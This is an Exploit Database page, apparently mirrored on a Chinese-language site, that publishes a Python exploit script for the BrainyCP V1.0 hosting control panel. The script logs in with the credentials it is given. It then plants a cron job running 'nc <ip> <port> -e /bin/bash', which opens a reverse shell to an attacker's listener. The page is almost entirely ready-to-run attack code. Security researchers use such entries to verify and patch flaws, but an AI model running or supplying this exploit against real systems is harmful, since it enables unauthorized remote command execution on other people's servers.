BrainyCP V1.0 – Remote Code Execution

• Exploit Database
• 14 阅读

• 作者： Ahmet Ümit BAYRAM
  日期： 2023-04-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51357/

• # Exploit Title: BrainyCP V1.0 - Remote Code Execution
  # Date: 2023-04-03
  # Exploit Author: Ahmet Ümit BAYRAM
  # Vendor Homepage: https://brainycp.io
  # Demo: https://demo.brainycp.io
  # Tested on: Kali Linux
  # CVE : N/A
  
  import requests
  
  # credentials
  url = input("URL: ")
  username = input("Username: ")
  password = input("Password: ")
  ip = input("IP: ")
  port = input("Port: ")
  
  # login 
  session = requests.Session()
  login_url = f"{url}/auth.php"
  login_data = {"login": username, "password": password, "lan": "/"}
  response = session.post(login_url, data=login_data)
  if "Sign In" in response.text:
  print("[-] Wrong credentials or may the system patched.")
  exit()
  
  
  # reverse shell 
  reverse_shell = f"nc {ip} {port} -e /bin/bash"
  
  # request
  add_cron_url = f"{url}/index.php?do=crontab&subdo=ajax&subaction=addcron"
  add_cron_data = {
  "cron_freq_minutes": "*",
  "cron_freq_minutes_own": "",
  "cron_freq_hours": "*",
  "cron_freq_hours_own": "",
  "cron_freq_days": "*",
  "cron_freq_days_own": "",
  "cron_freq_months": "*",
  "cron_freq_weekdays": "*",
  "cron_command": reverse_shell,
  "cron_user": username,
  }
  response = session.post(add_cron_url, data=add_cron_data)
  
  print("[+] Check your listener!")